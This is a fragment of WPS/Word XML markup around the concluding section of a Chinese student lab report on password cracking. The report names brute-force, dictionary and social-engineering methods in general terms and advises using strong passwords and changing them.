          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>、实验总结及心得体会</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首先，密码破解是一种非常不道德的行为，它可能会涉及到违法行为。因此，任何密码破解行为都应该遵守当地法律法规。</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其次，密码破解是一项技术活，需要掌握一定的技术知识。通常情况下，密码破解的方法有很多种，如暴力破解、字典破解、社会工程学等。</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暴力破解是一种通过尝试所有可能的密码组合来破解密码的方法。这种方法非常耗时，因为密码长度和复杂度的增加会增加破解密码所需的时间。而字典破解则是通过尝试一系列常见的密码组合来破解密码，这种方法要比暴力破解快得多。</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社会工程学是一种通过欺骗、诱导或伪装来获取密码的方法。这种方法通常包括通过钓鱼邮件或社交工程学攻击来获取用户的密码。因此，保护个人信息和密码的安全是非常重要的。</w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="3"/>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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后，我的建议是，保护密码的安全非常重要。我们应该采取一些措施来保护我们的密码，如使用强密码、定期更换密码、避免在公共网络上登录敏感账户等。如果我们怀疑我们的密码已经被泄露或被攻击，我们应该立即更改密码并通知相关的机构或组织。</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auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1134" w:bottom="1440" w:left="1418" w:header="1134" w:footer="1134" w:gutter="0"/>
      <w:pgNumType w:start="5"/>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仿宋_GB2312">
    <w:altName w:val="方正仿宋_GBK"/>
    <w:panose1 w:val="02010609030101010101"/>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楷体_GB2312">
    <w:altName w:val="汉仪楷体简"/>
    <w:panose1 w:val="02010609030101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000010" w:usb3="00000000" w:csb0="00040000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="汉仪楷体简">
    <w:panose1 w:val="02010600000101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0006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1978648"/>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EECAC9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EAEECAC9"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="3B2A6BA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B2A6BA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54145B1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54145B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29E1"/>
    <w:rsid w:val="0001600C"/>
    <w:rsid w:val="00033107"/>
    <w:rsid w:val="000332D6"/>
    <w:rsid w:val="00041195"/>
    <w:rsid w:val="000472CA"/>
    <w:rsid w:val="0007163F"/>
    <w:rsid w:val="00086313"/>
    <w:rsid w:val="000C734C"/>
    <w:rsid w:val="000E78E5"/>
    <w:rsid w:val="001043A8"/>
    <w:rsid w:val="001507B7"/>
    <w:rsid w:val="00167D6D"/>
    <w:rsid w:val="00195B37"/>
    <w:rsid w:val="001B1AD2"/>
    <w:rsid w:val="001E1C7A"/>
    <w:rsid w:val="001E7783"/>
    <w:rsid w:val="001F1B54"/>
    <w:rsid w:val="0026225E"/>
    <w:rsid w:val="00293580"/>
    <w:rsid w:val="002A4BCE"/>
    <w:rsid w:val="002B685B"/>
    <w:rsid w:val="002C2F63"/>
    <w:rsid w:val="0035662D"/>
    <w:rsid w:val="0036316F"/>
    <w:rsid w:val="00363250"/>
    <w:rsid w:val="003645BE"/>
    <w:rsid w:val="00366903"/>
    <w:rsid w:val="00391A1D"/>
    <w:rsid w:val="003A0E9A"/>
    <w:rsid w:val="003B3E9E"/>
    <w:rsid w:val="003D39BF"/>
    <w:rsid w:val="003E358D"/>
    <w:rsid w:val="003F3B54"/>
    <w:rsid w:val="00407AEB"/>
    <w:rsid w:val="00410EC1"/>
    <w:rsid w:val="00416A29"/>
    <w:rsid w:val="004229E1"/>
    <w:rsid w:val="0043114D"/>
    <w:rsid w:val="00435971"/>
    <w:rsid w:val="004713F0"/>
    <w:rsid w:val="004C0AC9"/>
    <w:rsid w:val="004C5855"/>
    <w:rsid w:val="00512A22"/>
    <w:rsid w:val="005173F8"/>
    <w:rsid w:val="005357F8"/>
    <w:rsid w:val="005570AE"/>
    <w:rsid w:val="00567EAD"/>
    <w:rsid w:val="005776F3"/>
    <w:rsid w:val="0058090D"/>
    <w:rsid w:val="005A287C"/>
    <w:rsid w:val="005C4ADE"/>
    <w:rsid w:val="005D12BB"/>
    <w:rsid w:val="005E0332"/>
    <w:rsid w:val="00620459"/>
    <w:rsid w:val="00634CF1"/>
    <w:rsid w:val="00652F6C"/>
    <w:rsid w:val="00667F57"/>
    <w:rsid w:val="0067695B"/>
    <w:rsid w:val="00681D9A"/>
    <w:rsid w:val="006A55EB"/>
    <w:rsid w:val="006B4C87"/>
    <w:rsid w:val="006B5CA1"/>
    <w:rsid w:val="006D47F2"/>
    <w:rsid w:val="006E5D52"/>
    <w:rsid w:val="00702660"/>
    <w:rsid w:val="00746408"/>
    <w:rsid w:val="0078449A"/>
    <w:rsid w:val="007A0021"/>
    <w:rsid w:val="007C0E32"/>
    <w:rsid w:val="007D4920"/>
    <w:rsid w:val="00805D42"/>
    <w:rsid w:val="008213D4"/>
    <w:rsid w:val="0084225B"/>
    <w:rsid w:val="00870979"/>
    <w:rsid w:val="008855E7"/>
    <w:rsid w:val="00895DBE"/>
    <w:rsid w:val="008A3242"/>
    <w:rsid w:val="008B085D"/>
    <w:rsid w:val="008B3C2F"/>
    <w:rsid w:val="008C4576"/>
    <w:rsid w:val="008D77CC"/>
    <w:rsid w:val="0090106F"/>
    <w:rsid w:val="009052E5"/>
    <w:rsid w:val="0091223A"/>
    <w:rsid w:val="009301FE"/>
    <w:rsid w:val="00953434"/>
    <w:rsid w:val="009861A4"/>
    <w:rsid w:val="009963C6"/>
    <w:rsid w:val="009A2F3E"/>
    <w:rsid w:val="00A011B9"/>
    <w:rsid w:val="00A943F8"/>
    <w:rsid w:val="00AB7017"/>
    <w:rsid w:val="00AC5300"/>
    <w:rsid w:val="00AC6A1E"/>
    <w:rsid w:val="00AD0527"/>
    <w:rsid w:val="00AF2395"/>
    <w:rsid w:val="00AF7388"/>
    <w:rsid w:val="00B051EB"/>
    <w:rsid w:val="00B75D74"/>
    <w:rsid w:val="00BA7523"/>
    <w:rsid w:val="00C03866"/>
    <w:rsid w:val="00C07273"/>
    <w:rsid w:val="00C70877"/>
    <w:rsid w:val="00C75048"/>
    <w:rsid w:val="00C76A63"/>
    <w:rsid w:val="00C8781F"/>
    <w:rsid w:val="00CA52BB"/>
    <w:rsid w:val="00CC76F4"/>
    <w:rsid w:val="00CE3E96"/>
    <w:rsid w:val="00D40911"/>
    <w:rsid w:val="00D455DD"/>
    <w:rsid w:val="00D65DEE"/>
    <w:rsid w:val="00D81F9C"/>
    <w:rsid w:val="00D905F6"/>
    <w:rsid w:val="00DA6CDD"/>
    <w:rsid w:val="00DB5C50"/>
    <w:rsid w:val="00DF27C3"/>
    <w:rsid w:val="00E037EC"/>
    <w:rsid w:val="00E27590"/>
    <w:rsid w:val="00E30CD1"/>
    <w:rsid w:val="00E37B40"/>
    <w:rsid w:val="00E648E4"/>
    <w:rsid w:val="00E86725"/>
    <w:rsid w:val="00E86820"/>
    <w:rsid w:val="00EA53BE"/>
    <w:rsid w:val="00EB040D"/>
    <w:rsid w:val="00EC3545"/>
    <w:rsid w:val="00F11BC9"/>
    <w:rsid w:val="00F21DE0"/>
    <w:rsid w:val="00F525CA"/>
    <w:rsid w:val="00F57A4D"/>
    <w:rsid w:val="00F95503"/>
    <w:rsid w:val="00FA5411"/>
    <w:rsid w:val="00FB3AE2"/>
    <w:rsid w:val="00FC76B9"/>
    <w:rsid w:val="01714EB5"/>
    <w:rsid w:val="02BD34D9"/>
    <w:rsid w:val="05742BED"/>
    <w:rsid w:val="062E515F"/>
    <w:rsid w:val="070827DC"/>
    <w:rsid w:val="08301A3A"/>
    <w:rsid w:val="094A7FEE"/>
    <w:rsid w:val="09512881"/>
    <w:rsid w:val="0ABF7D83"/>
    <w:rsid w:val="0ADC3C57"/>
    <w:rsid w:val="0AFB38B3"/>
    <w:rsid w:val="0B307A05"/>
    <w:rsid w:val="0B332455"/>
    <w:rsid w:val="0BF33251"/>
    <w:rsid w:val="0CA72DD7"/>
    <w:rsid w:val="0D2759F7"/>
    <w:rsid w:val="0DA0406F"/>
    <w:rsid w:val="0DA92E7F"/>
    <w:rsid w:val="0DE42646"/>
    <w:rsid w:val="0F4A6E1E"/>
    <w:rsid w:val="0F666BD9"/>
    <w:rsid w:val="108208FC"/>
    <w:rsid w:val="10A90D33"/>
    <w:rsid w:val="11506DDF"/>
    <w:rsid w:val="12AA29EC"/>
    <w:rsid w:val="131C73F1"/>
    <w:rsid w:val="13262FF8"/>
    <w:rsid w:val="142F21C3"/>
    <w:rsid w:val="15057CCE"/>
    <w:rsid w:val="15F2558B"/>
    <w:rsid w:val="15FE3096"/>
    <w:rsid w:val="18A25D50"/>
    <w:rsid w:val="18D806E3"/>
    <w:rsid w:val="195E12C9"/>
    <w:rsid w:val="19C6281A"/>
    <w:rsid w:val="1AF552B0"/>
    <w:rsid w:val="1AFD2457"/>
    <w:rsid w:val="1B8B165C"/>
    <w:rsid w:val="1DF40206"/>
    <w:rsid w:val="211B19BB"/>
    <w:rsid w:val="211F160A"/>
    <w:rsid w:val="215B54BB"/>
    <w:rsid w:val="21F7143F"/>
    <w:rsid w:val="22421622"/>
    <w:rsid w:val="22AE0144"/>
    <w:rsid w:val="23040AB5"/>
    <w:rsid w:val="23971C1F"/>
    <w:rsid w:val="241A58DE"/>
    <w:rsid w:val="2446143E"/>
    <w:rsid w:val="24D860C9"/>
    <w:rsid w:val="24FC7794"/>
    <w:rsid w:val="255F7C91"/>
    <w:rsid w:val="25C96A1D"/>
    <w:rsid w:val="265412B7"/>
    <w:rsid w:val="28332F91"/>
    <w:rsid w:val="295E52CA"/>
    <w:rsid w:val="2AFF29B7"/>
    <w:rsid w:val="2BBE68BF"/>
    <w:rsid w:val="2D59250B"/>
    <w:rsid w:val="2DD67F79"/>
    <w:rsid w:val="2E6973CF"/>
    <w:rsid w:val="2E8910C0"/>
    <w:rsid w:val="2EF14247"/>
    <w:rsid w:val="30FF57BA"/>
    <w:rsid w:val="31AB55B5"/>
    <w:rsid w:val="31E848FF"/>
    <w:rsid w:val="32677C63"/>
    <w:rsid w:val="36114C1C"/>
    <w:rsid w:val="36AD2FCC"/>
    <w:rsid w:val="374D4A11"/>
    <w:rsid w:val="393E4434"/>
    <w:rsid w:val="3A43557E"/>
    <w:rsid w:val="3ABF149C"/>
    <w:rsid w:val="3B380411"/>
    <w:rsid w:val="3B466E3F"/>
    <w:rsid w:val="3B8C426F"/>
    <w:rsid w:val="3BB977C7"/>
    <w:rsid w:val="3BE07DAB"/>
    <w:rsid w:val="3C341078"/>
    <w:rsid w:val="3CF122AE"/>
    <w:rsid w:val="3CF4337F"/>
    <w:rsid w:val="3F45376B"/>
    <w:rsid w:val="42CC73A3"/>
    <w:rsid w:val="43C31EAE"/>
    <w:rsid w:val="45B133F9"/>
    <w:rsid w:val="46342443"/>
    <w:rsid w:val="46916849"/>
    <w:rsid w:val="47424B53"/>
    <w:rsid w:val="478A4FB6"/>
    <w:rsid w:val="488C6308"/>
    <w:rsid w:val="49C94469"/>
    <w:rsid w:val="49E820E7"/>
    <w:rsid w:val="4AD65F51"/>
    <w:rsid w:val="4C663A0B"/>
    <w:rsid w:val="4D323520"/>
    <w:rsid w:val="4E6D0EB0"/>
    <w:rsid w:val="4ED57993"/>
    <w:rsid w:val="50841CBC"/>
    <w:rsid w:val="5188643C"/>
    <w:rsid w:val="525C5FC1"/>
    <w:rsid w:val="52F616AE"/>
    <w:rsid w:val="53104A51"/>
    <w:rsid w:val="5581039B"/>
    <w:rsid w:val="558B7E22"/>
    <w:rsid w:val="56B74872"/>
    <w:rsid w:val="575F4A2D"/>
    <w:rsid w:val="57A75DE4"/>
    <w:rsid w:val="58176674"/>
    <w:rsid w:val="58AA1436"/>
    <w:rsid w:val="58DC0666"/>
    <w:rsid w:val="59232C21"/>
    <w:rsid w:val="598046EE"/>
    <w:rsid w:val="5AB34422"/>
    <w:rsid w:val="5BE41F78"/>
    <w:rsid w:val="5BE8126B"/>
    <w:rsid w:val="5D637D98"/>
    <w:rsid w:val="5DAF7505"/>
    <w:rsid w:val="5E9975AA"/>
    <w:rsid w:val="5F0304E6"/>
    <w:rsid w:val="5F0C2A5A"/>
    <w:rsid w:val="5F2A5537"/>
    <w:rsid w:val="5F7D6567"/>
    <w:rsid w:val="60F30A3F"/>
    <w:rsid w:val="61F101D8"/>
    <w:rsid w:val="62330172"/>
    <w:rsid w:val="62D3627B"/>
    <w:rsid w:val="632149EF"/>
    <w:rsid w:val="63317B39"/>
    <w:rsid w:val="63C711D8"/>
    <w:rsid w:val="642E5F04"/>
    <w:rsid w:val="64841F45"/>
    <w:rsid w:val="64EC6B4B"/>
    <w:rsid w:val="64FB6082"/>
    <w:rsid w:val="650239BB"/>
    <w:rsid w:val="65B956F6"/>
    <w:rsid w:val="65CF2A40"/>
    <w:rsid w:val="67253DDE"/>
    <w:rsid w:val="68670794"/>
    <w:rsid w:val="68D71213"/>
    <w:rsid w:val="6917177E"/>
    <w:rsid w:val="6935715D"/>
    <w:rsid w:val="698169CC"/>
    <w:rsid w:val="6A3D0ECA"/>
    <w:rsid w:val="6ED61FDB"/>
    <w:rsid w:val="6FAF62DD"/>
    <w:rsid w:val="6FDC313B"/>
    <w:rsid w:val="70A7760C"/>
    <w:rsid w:val="710156D2"/>
    <w:rsid w:val="71095E2B"/>
    <w:rsid w:val="715F524D"/>
    <w:rsid w:val="735B56B7"/>
    <w:rsid w:val="74A04F07"/>
    <w:rsid w:val="74EC5387"/>
    <w:rsid w:val="76870994"/>
    <w:rsid w:val="76DC54A7"/>
    <w:rsid w:val="77861B99"/>
    <w:rsid w:val="77BD0143"/>
    <w:rsid w:val="78A80D54"/>
    <w:rsid w:val="78B86604"/>
    <w:rsid w:val="78CD2AC1"/>
    <w:rsid w:val="79C91930"/>
    <w:rsid w:val="7AC244AE"/>
    <w:rsid w:val="7BE64E7B"/>
    <w:rsid w:val="7BFF2343"/>
    <w:rsid w:val="7E1427B7"/>
    <w:rsid w:val="7E350795"/>
    <w:rsid w:val="7E831763"/>
    <w:rsid w:val="7F4770CA"/>
    <w:rsid w:val="7FA43D3B"/>
    <w:rsid w:val="B1DF4BBE"/>
    <w:rsid w:val="BAEF4C0F"/>
    <w:rsid w:val="EFFF6195"/>
    <w:rsid w:val="F4FB950A"/>
    <w:rsid w:val="F7F6F9E4"/>
    <w:rsid w:val="F7FBC903"/>
    <w:rsid w:val="FC4F675E"/>
    <w:rsid w:val="FFCF0B97"/>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qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0"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nhideWhenUsed="0" w:uiPriority="0"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tabs>
        <w:tab w:val="left" w:pos="6870"/>
      </w:tabs>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="51"/>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Body Text Indent"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="17"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:ind w:firstLine="640" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="Times New Roman" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>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rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>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page number"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="15">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="12"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="hlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="正文文本缩进 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="Times New Roman" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>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China</Company>
  <Pages>7</Pages>
  <Words>277</Words>
  <Characters>1581</Characters>
  <Lines>13</Lines>
  <Paragraphs>3</Paragraphs>
  <TotalTime>29</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1855</CharactersWithSpaces>
  <Application>WPS Office_4.4.1.7360_F1E327BC-269C-435d-A152-05C5408002CA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2014-11-01T20:08:00Z</dcterms:created>
  <dc:creator>ASUS</dc:creator>
  <cp:lastModifiedBy>亭亭如盖。</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-18T16:08:16Z</dcterms:modified>
  <cp:revision>126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2052-4.4.1.7360</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>4D29B6955DF9EBBF52F7FE63054F6CE6</vt:lpwstr>
  </property>
</Properties>
</file>